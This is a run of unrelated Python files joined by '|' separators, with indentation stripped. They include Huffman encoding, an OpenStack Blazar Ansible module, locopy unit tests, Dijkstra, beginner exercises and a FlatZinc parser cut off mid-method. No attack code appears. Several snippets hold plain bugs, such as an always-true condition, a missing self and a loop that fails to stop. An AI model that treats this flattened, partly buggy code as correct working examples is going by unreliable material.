:param unique_values: boolean value that indicates if the values are uniques for each node or not
If unique_values true, the value should be a container
:return: two dictionaries: - between values and codes (if unique_values false -> value of the dictionary - list)
- between codes and values
"""
values_to_codes = {}
codes_to_values = {}
initial_level = node.level
node.change_level(level)
node.assign_code(code)
if node.right_node:
values_to_codes_right, codes_to_values_right = encode_classes(node.right_node, code + '1', level - 1,
value_attr, unique_values)
if node.left_node:
values_to_codes_left, codes_to_values_left = encode_classes(node.left_node, code + '0', level - 1,
value_attr, unique_values)
if initial_level == 0:
value = getattr(node, value_attr)
if unique_values:
value = value.pop()
values_to_codes[value] = node.code
else:
values_to_codes[value] = [node.code]
codes_to_values[node.code] = value
return values_to_codes, codes_to_values
if unique_values:
values_to_codes = {**values_to_codes_right, **values_to_codes_left}
else:
values_to_codes = merge_dict(values_to_codes_left, values_to_codes_right)
codes_to_values = {**codes_to_values_left, **codes_to_values_right}
return values_to_codes, codes_to_values
def build_huffman_tree(list_of_values):
"""
Builds the Huffman Tree structure (nodes, left node, right node, values)
:param list_of_values: The list of values the tree should use
:return: the root node of the tree
"""
p = queue.PriorityQueue()
for value in list_of_values:
p.put((value, HuffmanBinaryNode(value)))
while p.qsize() > 1:
left_value, left_node, right_value, right_node = *p.get(), *p.get()
left_level = left_node.level
right_level = right_node.level
root_value = left_value + right_value
root_level = max(left_level, right_level) + 1
p.put((root_value, HuffmanBinaryNode(root_value, left_node, right_node, root_level)))
root = p.get()
if type(root) is tuple:
return root[1]
else:
return HuffmanBinaryNode(root)
def create_encoding_huffman(users):
"""
Main function for Huffman Encoding. Builds the tree, calculates the codes for every class and returns the dicts
:param users: the list of users to encode. The frequency of the users is going to be calculated using this list
:return: two dictionaries: - between classes and codes
- between codes and classes
"""
count_users = users.value_counts()
freq_list = list(count_users)
root = build_huffman_tree(freq_list)
dict_value_code, _ = encode_classes(root, '', root.level, "value", False)
dict_class_code = {}
dict_code_class = {}
for index, value in count_users.iteritems():
code = dict_value_code[value].pop(0)
dict_class_code[index] = code
dict_code_class[code] = index
return dict_class_code, dict_code_class, root.level
def create_balanced_tree_encoding(users):
"""
Main function for Balanced Tree encoding. Calculates the codes for every class and returns the dicts
:param users: the list of users to encode. The frequency of the users is going to be calculated using this list
:return: two dictionaries: - between classes and codes
- between codes and classes
"""
count_users = users.value_counts()
freq_list = list(count_users)
value_to_codes, max_len = assign_code(freq_list)
dict_user_code = {}
dict_code_user = {}
for index, value in count_users.iteritems():
code = value_to_codes[value].pop(0)
dict_user_code[index] = code
dict_code_user[code] = index
return dict_user_code, dict_code_user, max_len
def encode_users(users, dict_user_code, encoding_length):
"""
Encode the users from the list
:param users: The list of users to be encoded
:param dict_user_code: The dict with users as key and their binary code as value
:param encoding_length: The length of the binary codes
:return: a pandas Dataframe with vectors corresponding to classes.
Column names are "col_[x]" where [x] is from 1 to encoding_length
"""
col_names = ['col_'+str(i) for i in range(encoding_length)]
encoded_users = pd.DataFrame(index=np.arange(len(users)), columns=col_names)
i = 0
for user in users:
encoded_users.iloc[i] = list(dict_user_code[user])
i += 1
return encoded_users
def decode_users(encoded_users, dict_code_user):
"""
Transform a pandas Dataframe with binary values and number of columns equal to the keys from dict_code_user
to a list of classes
:param encoded_users: a pandas Dataframe with binary values and
number of columns equal to the keys from dict_code_user
:param dict_code_user: a dict to transform the binary string codes to users.
:return: the list of users that have be obtained during decoding
"""
users = ['' for _ in range(len(encoded_users))]
i = 0
encoded_user_list = encoded_users.to_string(header=False, index=False, index_names=False).split('\n')
encoded_user_str_list = [''.join(elements.split()) for elements in encoded_user_list]
for string in encoded_user_str_list:
if string in dict_code_user:
users[i] = dict_code_user[string]
i += 1
else:
closest_class = closest_word(string, list(dict_code_user.keys()))
users[i] = dict_code_user[closest_class]
i += 1
return users
def humming_distance(word1, word2):
"""
Calculated the bitwise distance between two words.
If one word is longer than another, the difference of length is added to the result.
:param word1: first word
:param word2: second word
:return: the number of different characters between the two words
"""
count = abs(len(word1)-len(word2))
for j in range(len(min(word1, word2, key=len))):
if word2[j] != word1[j]:
count += 1
return count
def closest_word(word, list_word):
"""
Calculated the closest word from the list_word to the word
:param word: the word whose nearest neighbour should be calculated
:param list_word: the list of words to be considered
:return: the nearest word from list_word to the word
"""
distance = []
for i in list_word:
distance.append(humming_distance(word, i))
return list_word[distance.index(min(distance))]
def assign_code(values_list, code=''):
"""
Method to assign the codes for the Balanced Tree Encoding
:param values_list: list of values to encode
:param code: the code for the current "node"
:return: values_to_codes - dict with list of codes for every value,
max_len - the length of the codes
"""
values_to_codes = {}
if len(values_list) == 1:
values_to_codes[values_list[0]] = [code]
return values_to_codes, len(code)
right_side = False
right_list = []
left_list = []
while len(values_list):
value = random.choices(values_list, weights=values_list, k=1).pop()
values_list.remove(value)
if right_side:
right_list.append(value)
right_side = False
else:
left_list.append(value)
right_side = True
values_to_codes_left, max_len_left = assign_code(left_list, code+'0')
values_to_codes_right, max_len_right = assign_code(right_list, code+'1')
max_len = max(max_len_right, max_len_left)
values_to_codes = merge_dict(values_to_codes_left, values_to_codes_right, max_len)
return values_to_codes, max_len
|
'''
Name:
Date:
Class:
Assignment:
'''
import webapp2# uses the webapp2 library
class MainHandler(webapp2.RequestHandler): #Declaring a class
def get(self):# Function that starts everything. Catalyst.
about_button = Button()
about_button.label = "About Us"
about_button.show_label()
contact_button = Button()
contact_button.label = "Contact Us"
contact_button.show_label()
#code goes here
class Button(object):
def __init__(self):
self.label = "" # Public attribute.
self.__size = 60 # Private attribute.
self._color = "000000" #Protected attribute
#self.on_roll_over("Hello.")
def click(self):#self is equivalent to this in javascript.
print "I've been clicked"
def on_roll_over(self, message):
print "You've rolled over my button" + message
def show_label(self):
print "My label is "+self.label
#Leave this alone, don't touch it.
app = webapp2.WSGIApplication([
('/', MainHandler)
], debug=True)
|
# encoding: utf-8
# -*- test-case-name: ipython1.test.test_nodes -*-
"""The classes and interfaces for nodes and cells for use in notebooks
"""
__docformat__ = "restructuredtext en"
#-------------------------------------------------------------------------------
# Copyright (C) 2005 Fernando Perez <fperez@colorado.edu>
# Brian E Granger <ellisonbg@gmail.com>
# Benjamin Ragan-Kelley <benjaminrk@gmail.com>
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------
import zope.interface as zi
from IPython.genutils import time
# the classes for use in notebook.py
classes = ['TextCell', 'IOCell', 'ImageCell', 'Node']
#-------------------------------------------------------------------------------
# Node and Cell Interfaces
#-------------------------------------------------------------------------------
class ICell(zi.Interface):
"""The Basic Cell Interface, implemented by all Nodes and Cells"""
parent = zi.Attribute("Node: The parent object of the cell")
dateCreated = zi.Attribute("String: The date the cell was created")
dateModified = zi.Attribute("String: The date the cell was most recently modified")
tags = zi.Attribute("List of Strings: Tags used for searching")
class INode(ICell):
"""The Basic Node Interface"""
children = zi.Attribute("Dict: the children of the node")
def addChild(child, index=None):
"""adds `child` to the node after `index`, defaulting to the end"""
def popChild(index):
"""removes the child at `index`"""
class ITextCell(ICell):
"""A Basic text cell"""
text = zi.Attribute("String: the text of the cell")
format = zi.Attribute("String: the formatting for the text")
class IIOCell(ICell):
"""A Basic I/O Cell"""
input = zi.Attribute("String: input python code")
output = zi.Attribute("String: The output of input")
class IImageCell(ICell):
"""A Basic Cell for images"""
image = zi.Attribute("Image: The image object")
#-------------------------------------------------------------------------------
# Node and Cell Objects
#-------------------------------------------------------------------------------
# helper code for strings
def _padstr(n):
return "%02i"%n
def strtime():
return ":".join(map(_padstr, time.localtime()[:6]))
class Cell(object):
"""The base Cell class"""
zi.implements(ICell)
def _modify(self):
self.dateModified = strtime()
if self.parent is not None:
self.parent._modify()
def _setCreated(self, c):
raise IOError("dateCreated cannot be changed")
def _getCreated(self): return self._dateCreated
def _setTags(self, tags):
self._tags = tags
self._modify()
def _getTags(self): return self._tags
tags = property(_getTags, _setTags)
dateCreated = property(_getCreated, _setCreated)
def __init__(self, id, parent=None, tags=[]):
self.id = id
self.parent = parent
self._dateCreated = strtime()
self.dateModified = self.dateCreated
self._tags = tags
def addTags(self, **tags):
self._tags.update(tags)
self._modify()
class Node(Cell):
"""The basic Node class"""
zi.implements(INode)
className="Node"
def __init__(self, id, parent=None, flags={}):
self.children = []
super(Node, self).__init__(parent, flags)
def addChild(self, child, index=None):
"""add child at index, defaulting to the end"""
if index is None:
# add to end
self.children.append(child)
self._modify()
return len(self.children) - 1
elif index < len(self.children):
self.children = self.children[:index]+[child]+self.children[index:]
self._modify()
return index
else:
raise IndexError
def popChild(self, index):
"""remove and return child at index"""
if index < len(self.children):
self._modify()
return self.children.pop(index)
else:
raise IndexError
class TextCell(Cell):
"""A Cell for text"""
zi.implements(ITextCell)
className="TextCell"
def _setText(self, text):
self._text = text
self._modify()
def _getText(self): return self._text
text = property(_getText, _setText)
def __init__(self, id, text="", parent=None, tags=[]):
super(TextCell, self).__init__(id, parent, tags)
self._text = text
class IOCell(Cell):
"""A Cell for handling execution"""
zi.implements(IIOCell)
className="IOCell"
def _setInput(self, inp):
self._input = inp
self._modify()
def _getInput(self): return self._input
def _setOutput(self, out):
self._output = out
self._modify()
def _getOutput(self): return self._output
input = property(_getInput, _setInput)
output = property(_getOutput, _setOutput)
def __init__(self, id, input="", parent=None, tags=[]):
self._input = input
self._output = ""
super(IOCell, self).__init__(id, parent, tags)
class ImageCell(Cell):
"""A Cell for holding images"""
zi.implements(IImageCell)
className="ImageCell"
def _setImage(self, im):
self._image = im
self._modify()
def _getImage(self): return self._image
def __init__(self, id, im=None, parent=None, tags=[]):
self._image = im
super(ImageCell, self).__init__(id, parent, tags)
|
print('testing 061121')
print('this is a change')
print('just generated a gpg key for the sake of verifying commits') |
# get the user's information
print("\nPlease enter the following information:\n")
first_name = input("First name: ")
last_name = input("Last name: ")
email = input("Email address: ")
phone = input("Phone number: ")
job_title = input("Job title: ")
id_number = input("ID number: ")
hair = input("Hair color: ")
eyes = input("Eye color: ")
month = input("Month started: ")
answer = input("Have you completed training(Y/N): ")
if answer == "y" or "N":
training = "Yes"
else:
training = "No"
# combine variables for alignment
hair_color = "Hair: " + hair
eye_color = "Eyes: " + eyes
start_month = "Month: " + month
training_completed = "Training: " + training
# output the user's id card
print("\nThe ID Card is:")
print("--------------------------------------------")
print(f"{last_name.upper()}, {first_name.capitalize()}\n{job_title.title()}\nID: {id_number}\n\n{email.lower()}\n{phone}\n")
# output aligned text
print(f"{hair_color.title() : <18}{eye_color.title() : <15}")
print(f"{start_month.title() : <18}{training_completed.title() : <15}")
print("--------------------------------------------\n")
|
import pytest, time
from utils import environment as env
from utils.environment import Pages as on
@pytest.mark.usefixtures("test_setup")
class TestCNTProject(object):
def test_sal(self):
self.driver.get(env.page_url)
on.Home.navigate_to_saysalot_page(self)
on.SAL.scrolling_down_page(self)
on.SAL.click_on_sal_card(self)
on.SAL.go_back_to_previous_page(self)
on.SAL.submit_invalid_email(self)
on.SAL.clear_email_field(self)
on.SAL.submit_valid_email(self)
on.SAL.scrolling_down_page(self)
on.SAL.click_see_more_button(self)
|
#!/usr/bin/python
#import json
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def _get_blazar_hosts(reservation):
req_url = reservation.get_endpoint() + "/os-hosts"
return reservation.get(url=req_url).json()
def _get_host_by_hostname(reservation, hostname):
hosts = _get_blazar_hosts(reservation)
for host in hosts['hosts']:
if host['hypervisor_hostname'] == hostname:
return host
return None
def main():
argument_spec = openstack_full_argument_spec(
name=dict(required=False),
node_type=dict(required=False),
state=dict(default='present', choices=['absent', 'present'])
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(
argument_spec,
supports_check_mode=True,
**module_kwargs
)
name = module.params['name']
node_type = module.params['node_type']
state = module.params['state']
sdk, cloud = openstack_cloud_from_module(module)
# Find associated Ironic node
try:
node = cloud.get_machine(name)
node_uuid = node['id']
except:
module.fail_json(msg="Cannot find Ironic node for %s." % name)
try:
blazar = cloud.reservation
if module.params['state'] == 'present':
host_data = dict(
name=node_uuid,
node_type=node_type
)
# Does a host already exist for this hypervisor_hostname?
host = _get_host_by_hostname(blazar, node_uuid)
if not host:
# No host, so add one
req_url = "%s/os-hosts" % (blazar.get_endpoint())
new_host = blazar.post(url=req_url, json=host_data).json()
if 'error_code' in new_host:
module.fail_json(msg=new_host['error_message'])
module.exit_json( changed=True, result="Node added.", changes=new_host)
else: # Host exists
# Does it need to be updated?
try:
host_config = dict(
name=host['hypervisor_hostname'],
node_type=host['node_type']
)
except:
host_config = dict(
name=host['hypervisor_hostname'],
)
# Determine configuration change(s)
patch_dict = dict( set(host_data.items()) - set(host_config.items()))
if patch_dict:
req_url = "%s/os-hosts/%s" % (blazar.get_endpoint(), host['id'])
update_host = blazar.put(url=req_url, json=patch_dict).json()
if 'error_code' in update_host:
module.fail_json(msg=update_host['error_message'])
module.exit_json(changed=True, result="Node updated", changes=patch_dict)
else:
module.exit_json(changed=False, result="Node not updated")
else:
module.exit_json(changed=False, msg="Removing hosts is not currently supported.")
except sdk.exceptions.OpenStackCloudException as e:
module.fail_json(msg=e.message, extra_data=e.extra_data)
if __name__ == '__main__':
main()
|
import os
import sys
import time
from codebase.utils.log import Log
from codebase.datasets import TextDataset, DataPreprocess
from codebase.utils.prepare import Preparation
from codebase.condGAN import condGAN
dir_path = (os.path.abspath(os.path.join(os.path.realpath(__file__), './.')))
sys.path.append(dir_path)
if __name__ == "__main__":
# Preparing environment
prep = Preparation()
cfg = prep.parse_arguments('cfg/eval_bird.yml')
prep.set_random_seed()
output_dir = prep.set_output_dir()
prep.set_cuda()
# Init log
log = Log(output_dir)
log.add('Using config: {} \n'.format(cfg), False)
# Get data loader
dataprep = DataPreprocess(log)
image_transform = dataprep.image_transform()
dataloader, dataset = dataprep.get_dataloader('test', image_transform, True)
# Define models and go to evaluate
model = condGAN(output_dir, dataloader, dataset.n_words, dataset.ixtoword, log)
start_t = time.time()
# Generate images from pre-extracted embeddings
if cfg.B_VALIDATION:
model.sampling('test') # generate images for the whole valid dataset
else:
model.prepare_dict_from_files(dataset.wordtoix) # generate images for customized captions
end_t = time.time()
log.add('Total time for evaluation: {}'.format(end_t - start_t))
|
def intro(**data):
print("\nData type of argument:",type(data))
for key, value in data.items():
print("{} is {}".format(key,value))
intro(Firstname="Sita", Lastname="Sharma", Age=22, Phone=1234567890)
intro(Firstname="John", Lastname="Wood", Email="johnwood@nomail.com", Country="Wakanda", Age=25, Phone=9876543210)
h = {"id":2,"class":7,"roll":9}
intro(**h) |
# MIT License
#
# Copyright (c) 2018 Capital One Services, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import pytest
from unittest import mock
from io import StringIO
from itertools import cycle
from botocore.credentials import Credentials
from locopy.utility import compress_file, compress_file_list, split_file, concatenate_files
from locopy.errors import CompressionError, LocopySplitError, CredentialsError, LocopyConcatError
import locopy.utility as util
GOOD_CONFIG_YAML = u"""host: my.redshift.cluster.com
port: 1234
database: db
user: userid
password: pass"""
BAD_CONFIG_YAML = """port: 1234
database: db
user: userid
password: pass"""
def cleanup(splits):
for file in splits:
os.remove(file)
def compare_file_contents(base_file, check_files):
check_files = cycle([open(x, "rb") for x in check_files])
with open(base_file, "rb") as base:
for line in base:
cfile = next(check_files)
compare_line = cfile.readline()
if compare_line != line:
return False
return True
@mock.patch("locopy.utility.open")
@mock.patch("locopy.utility.gzip.open")
@mock.patch("locopy.utility.shutil.copyfileobj")
def test_compress_file(mock_shutil, mock_gzip_open, mock_open):
compress_file("input", "output")
mock_open.assert_called_with("input", "rb")
mock_gzip_open.assert_called_with("output", "wb")
mock_shutil.assert_called_with(mock_open().__enter__(), mock_gzip_open().__enter__())
@mock.patch("locopy.utility.open")
@mock.patch("locopy.utility.gzip.open")
@mock.patch("locopy.utility.shutil.copyfileobj")
def test_compress_file_exception(mock_shutil, mock_gzip_open, mock_open):
mock_shutil.side_effect = Exception("SomeException")
with pytest.raises(CompressionError):
compress_file("input", "output")
@mock.patch("locopy.utility.os.remove")
@mock.patch("locopy.utility.open")
@mock.patch("locopy.utility.gzip.open")
@mock.patch("locopy.utility.shutil.copyfileobj")
def test_compress_file_list(mock_shutil, mock_gzip_open, mock_open, mock_remove):
res = compress_file_list([])
assert res == []
res = compress_file_list(["input1"])
assert res == ["input1.gz"]
res = compress_file_list(["input1", "input2"])
assert res == ["input1.gz", "input2.gz"]
@mock.patch("locopy.utility.os.remove")
@mock.patch("locopy.utility.open")
@mock.patch("locopy.utility.gzip.open")
@mock.patch("locopy.utility.shutil.copyfileobj")
def test_compress_file_list_exception(mock_shutil, mock_gzip_open, mock_open, mock_remove):
mock_shutil.side_effect = Exception("SomeException")
with pytest.raises(CompressionError):
compress_file_list(["input1", "input2"])
def test_split_file():
input_file = "tests/data/mock_file.txt"
output_file = "tests/data/mock_output_file.txt"
splits = split_file(input_file, output_file)
assert splits == [input_file]
expected = ["tests/data/mock_output_file.txt.0", "tests/data/mock_output_file.txt.1"]
splits = split_file(input_file, output_file, 2)
assert splits == expected
assert compare_file_contents(input_file, expected)
cleanup(splits)
expected = [
"tests/data/mock_output_file.txt.0",
"tests/data/mock_output_file.txt.1",
"tests/data/mock_output_file.txt.2",
]
splits = split_file(input_file, output_file, 3)
assert splits == expected
assert compare_file_contents(input_file, expected)
cleanup(splits)
expected = [
"tests/data/mock_output_file.txt.0",
"tests/data/mock_output_file.txt.1",
"tests/data/mock_output_file.txt.2",
"tests/data/mock_output_file.txt.3",
"tests/data/mock_output_file.txt.4",
]
splits = split_file(input_file, output_file, 5)
assert splits == expected
assert compare_file_contents(input_file, expected)
cleanup(splits)
def test_split_file_exception():
input_file = "tests/data/mock_file.txt"
output_file = "tests/data/mock_output_file.txt"
if sys.version_info.major == 3:
builtin_module_name = "builtins"
else:
builtin_module_name = "__builtin__"
with pytest.raises(LocopySplitError):
split_file(input_file, output_file, -1)
with pytest.raises(LocopySplitError):
split_file(input_file, output_file, 0)
with pytest.raises(LocopySplitError):
split_file(input_file, output_file, 5.65)
with pytest.raises(LocopySplitError):
split_file(input_file, output_file, "123")
with pytest.raises(LocopySplitError):
split_file(input_file, output_file, "Test")
with mock.patch("{0}.next".format(builtin_module_name)) as mock_next:
with mock.patch("os.remove") as mock_remove:
mock_next.side_effect = Exception("SomeException")
with pytest.raises(LocopySplitError):
split_file(input_file, output_file, 2)
assert mock_remove.call_count == 2
mock_remove.reset_mock()
with pytest.raises(LocopySplitError):
split_file(input_file, output_file, 3)
assert mock_remove.call_count == 3
cleanup(
[
"tests/data/mock_output_file.txt.0",
"tests/data/mock_output_file.txt.1",
"tests/data/mock_output_file.txt.2",
]
)
@mock.patch("locopy.utility.open", mock.mock_open(read_data=GOOD_CONFIG_YAML))
def test_read_config_yaml_good():
actual = util.read_config_yaml("filename.yml")
assert set(actual.keys()) == set(["host", "port", "database", "user", "password"])
assert actual["host"] == "my.redshift.cluster.com"
assert actual["port"] == 1234
assert actual["database"] == "db"
assert actual["user"] == "userid"
assert actual["password"] == "pass"
def test_read_config_yaml_io():
actual = util.read_config_yaml(StringIO(GOOD_CONFIG_YAML))
assert set(actual.keys()) == set(["host", "port", "database", "user", "password"])
assert actual["host"] == "my.redshift.cluster.com"
assert actual["port"] == 1234
assert actual["database"] == "db"
assert actual["user"] == "userid"
assert actual["password"] == "pass"
def test_read_config_yaml_no_file():
with pytest.raises(CredentialsError):
util.read_config_yaml("file_that_does_not_exist.yml")
def test_concatenate_files():
inputs = ["tests/data/cat_1.txt", "tests/data/cat_2.txt", "tests/data/cat_3.txt"]
output = "tests/data/cat_output.txt"
with mock.patch("locopy.utility.os.remove") as mock_remove:
concatenate_files(inputs, output)
assert mock_remove.call_count == 3
assert [int(line.rstrip("\n")) for line in open(output)] == list(range(1, 16))
os.remove(output)
def test_concatenate_files_exception():
inputs = ["tests/data/cat_1.txt", "tests/data/cat_2.txt", "tests/data/cat_3.txt"]
output = "tests/data/cat_output.txt"
with pytest.raises(LocopyConcatError):
concatenate_files([], output, remove=False)
with mock.patch("locopy.utility.open") as mock_open:
mock_open.side_effect = Exception()
with pytest.raises(LocopyConcatError):
concatenate_files(inputs, output, remove=False)
|
import heapq
from collections import defaultdict
from sys import maxsize
class Graph:
def __init__(self, n):
self.graph = defaultdict(list)
self.n = n
def add_edge(self, u, v, weight):
self.graph[u].append((v, weight))
def printer(self):
print(f"U\tV\tW")
print(f"-" * 10)
n = max(self.graph) + 1
for i in range(n):
for j in self.graph[i]:
print(f"{i}\t{j[0]}\t{j[1]}")
print(f"-" * 10)
def dijkstra(self, start, end):
visited = [False] * self.n
previous = [None] * self.n
distance = [maxsize] * self.n
distance[start] = 0
q = []
heapq.heappush(q, (start, 0))
while len(q) != 0:
index, min_value = heapq.heappop(q)
visited[index] = True
if distance[index] < min_value:
continue
for edge in self.graph[index]:
if visited[edge[0]]:
continue
new_distance = distance[index] + edge[1]
if new_distance < distance[edge[0]]:
distance[edge[0]] = new_distance
previous[edge[0]] = index
try:
heapq.heapreplace(q, (edge[0], new_distance))
except IndexError:
heapq.heappush(q, (edge[0], new_distance))
if index == end:
return distance, previous
return distance, previous
def find_shortest_path(self, start, end):
distance, previous = self.dijkstra(start, end)
path = []
if distance[end] == maxsize:
return path
at = end
while at is not None:
path.append(at)
at = previous[at]
return list(reversed(path))
g = Graph(3)
g.add_edge(0, 1, 1)
g.add_edge(0, 2, 2)
g.add_edge(1, 2, 3)
g.printer()
print(g.find_shortest_path(0, 2))
|
"""
============================
Author:柠檬班-木森
Time:2020/1/6 21:30
E-mail:3247119728@qq.com
Company:湖南零檬信息技术有限公司
============================
"""
"""
需求:1、计算1+2+3+4+。。。。100的结果
内置函数range:
range(n):默认生成一个 0到n-1的整数序列,对于这个整数序列,我们可以通过list()函数转化为列表类型的数据。
range(n,m):默认生成一个n到m-1的整数序列,对于这个整数序列,我们可以通过list()函数转化为列表类型的数据。
range(n,m,k):相当于其他函数里面的for循环。n 初始值 m 结束值 , k 步长,会生成初始值为n,结束值为m-1,递减或者是递增的整数序列。
range返回的数据是支持使用for进行遍历的,也能够进行下标取值 和切片(切片返回的还是range类型的数据)
"""
# print(list(range(10)))
# r = range(1,101)
# print(r[:10])
# print(list(r))
# print(list(range(1,101,5)))
# while循环实现
# i = 1
# s = 0
# while i <= 100:
# s = s + i
# i += 1
#
# print(s)
# s = 0
# for i in range(1, 101):
# s = s +i
# print(s)
"""
需求二:使用for打印100遍hello python
需求三:打印到第50遍之后 后面的不再打印
for循环也支持使用break,continue
"""
for i in range(100):
print("这是第{}遍打印:hello python".format(i + 1))
if i + 1 == 50:
continue
print("------------------------end:{}------------------------".format(i+1))
|
# Given a string, determine if it is a palindrome, considering only
# alphanumeric characters and ignoring cases.
#
# Return 0 / 1 ( 0 for false, 1 for true ) for this problem.
# import string
# def isPalindrome(s):
# s = s.lower() #ignoring case
# # s = s.translate(None, string.punctuation)
# s.translate(str.maketrans('', '', string.punctuation))
# s = s.replace(" ", "")
# return s == s[::-1]
#
class Solution:
# @param A : string
# @return an integer
def isPalindrome(A):
s = A.lower() #ignoring case
s = s.replace(" ", "")
clean_string = ""
for ch in s:
if ch.isalnum():
clean_string = clean_string + ch
return int(clean_string == clean_string[::-1])
print(
isPalindrome("1a2")
)
|
import numpy as np
my_list1=[1,2,3,4]
my_list2=[5,6,7,8]
my_array=np.array([my_list1,my_list2])
#print (my_array)
#usage of shape function
#print (my_array.shape)
#finding out the datatype of the memeber of the array
#print (my_array.dtype)
#zeros, ones, empty, eye, arrage
#new_array1=np.zeros(5)
#print (new_array1)
#new_array1=np.eye(5)
new_array1=np.arange(5,50,3)
print (new_array1)
|
from csv2libsvm import csv2libsvm
from optparse import OptionParser, OptionValueError, Option
import copy
import json
def check_csv_str(option, opt, value):
try:
return value.split(",")
except ValueError:
raise OptionValueError("option %s: invalid csv list value: %s" % (opt, value))
def check_json(option, opt, value):
try:
return json.loads(value)
except ValueError:
raise OptionValueError("option %s: invalid json value: %s" % (opt, value))
class MyOption(Option):
TYPES = Option.TYPES + ("csvlist", "json")
TYPE_CHECKER = copy.copy(Option.TYPE_CHECKER)
TYPE_CHECKER["csvlist"] = check_csv_str
TYPE_CHECKER["json"] = check_json
parser = OptionParser(option_class=MyOption) # type: ignore
parser.add_option("-i", "--infile", dest="infile", help="input file name")
parser.add_option(
"-o", "--outpath", dest="outpath", help="path to directory for output"
)
parser.add_option(
"-t", "--target", dest="target", help="string name of target variable"
)
parser.add_option(
"-w", "--weight", dest="weight", help="string name of weight variable"
)
parser.add_option(
"-z", "--split", dest="split", help="string name of variable with dev/val, etc..."
)
parser.add_option(
"-p",
"--probs",
dest="split",
type="json",
help="json object of probs to create multiple output files",
)
parser.add_option(
"-f",
"--factors",
type="csvlist",
dest="factors",
default=[],
help="csv list of strings indicating factor columns",
)
parser.add_option(
"-s",
"--skip",
type="csvlist",
dest="skip",
default=[],
help="csv list of string names to skip",
)
parser.add_option(
"-k",
"--keep",
type="csvlist",
dest="keep",
default=[],
help="csv list of string names to keep",
)
parser.add_option(
"-n",
"--na_strings",
type="csvlist",
dest="na_strings",
default=[""],
help="csv list of strings representing NULL values",
)
parser.add_option(
"-N",
"--nrows",
type="int",
dest="nrows",
help="number of input file rows to process",
)
parser.add_option(
"-m", "--meta", dest="meta", help="path to saved meta.json file from previous run"
)
def main():
(options, args) = parser.parse_args()
csv2libsvm(
infile=options.infile,
outpath=options.outpath,
target=options.target,
weight=options.weight,
split=options.split,
factors=options.factors,
skip=options.skip,
keep=options.keep,
na_strings=options.na_strings,
nrows=options.nrows,
meta=options.meta,
)
|
# --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2017, 2018
# --------------------------------------------------------------------------
# Author: Olivier OUDOT, IBM Analytics, France Lab, Sophia-Antipolis
"""
Parser converting a FZN file to internal model representation.
This parser does not support the complete set of predicates described in the specifications of FlatZinc
that can be found here: http://www.minizinc.org/downloads/doc-1.6/flatzinc-spec.pdf
Basically, it supports essentially integer expressions, some floating point expressions and custom
predicates related to scheduling.
The predicates that are supported are:
* *array predicates*
array_bool_and, array_bool_element, array_bool_or, array_bool_xor,
array_float_element, array_int_element, array_set_element,
array_var_bool_element, array_var_float_element, array_var_int_element, array_var_set_element.
* *boolean predicates*
bool2int, bool_and, bool_clause, bool_eq, bool_eq_reif, bool_le, bool_le_reif,
bool_lin_eq, bool_lin_le, bool_lt, bool_lt_reif, bool_not, bool_or, bool_xor.
* *integer predicates*
int_abs, int_div, int_eq, int_eq_reif, int_le, int_le_reif, int_lin_eq, int_lin_eq_reif,
int_lin_le, int_lin_le_reif, int_lin_ne, int_lin_ne_reif, int_lt, int_lt_reif, int_max, int_min,
int_mod, int_ne, int_ne_reif, int_plus, int_times, int2float.
* *float predicates*
float_abs, float_exp, float_ln, float_log10, float_log2, float_sqrt, float_eq, float_eq_reif,
float_le, float_le_reif, float_lin_eq, float_lin_eq_reif, float_lin_le, float_lin_le_reif, float_lin_lt,
float_lin_lt_reif, float_lin_ne, float_lin_ne_reif, float_lt, float_lt_reif, float_max, float_min,
float_ne, float_ne_reif, float_plus.
* *set predicates*
set_in, set_in_reif.
* *custom predicates*
all_different_int, subcircuit, count_eq_const, table_int, inverse,
lex_lesseq_bool, lex_less_bool, lex_lesseq_int, lex_less_int, int_pow, cumulative
Detailed description
--------------------
"""
from docplex.cp.fzn.fzn_tokenizer import *
from docplex.cp.expression import *
from docplex.cp.solution import *
from docplex.cp.model import CpoModel
import docplex.cp.modeler as modeler
import docplex.cp.config as config
import docplex.cp.expression as expression
import collections
from docplex.cp.utils import xrange, is_int_value
import traceback
###############################################################################
## Constants
###############################################################################
###############################################################################
## Public classes
###############################################################################
class FznParserException(CpoException):
""" The base class for exceptions raised by the CPO parser
"""
def __init__(self, msg):
""" Create a new exception
Args:
msg: Error message
"""
super(FznParserException, self).__init__(msg)
# Parameter descriptor
FznParameter = collections.namedtuple('FznParameter', ('name', # Variable name
'type', # Variable type (string)
'size', # Array size (if array), None for single value
'value', # Value
))
class FznObject(object):
""" Descriptor of a FZN object
"""
__slots__ = ()
class FznParameter(FznObject):
""" Descriptor of a FZN parameter
"""
__slots__ = ('name', # Parameter name
'type', # Parameter type
'size', # Array size (if array), None for variable
'value', # Initial value (if any)
)
def __init__(self, name, type, size, value):
""" Create a new FZN parameter
Args:
name: Name of the parameter
type: Type of the parameter
size: Array size, None if not array
value: Parameter value
"""
self.name = name
self.type = type
self.size = size
self.value = value
def __str__(self):
lstr = [self.name, "(type=", str(self.type)]
if self.size:
lstr.append(', size=')
lstr.append(str(self.size))
